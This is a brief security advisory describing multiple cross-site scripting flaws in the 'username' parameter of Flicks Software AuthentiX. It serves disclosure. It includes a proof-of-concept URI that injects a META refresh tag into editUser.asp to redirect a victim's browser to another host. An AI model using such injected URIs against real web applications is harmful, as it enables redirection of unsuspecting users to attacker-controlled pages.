Flicks Software AuthentiX 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities

Flicks Software AuthentiX 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URI is available:

https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E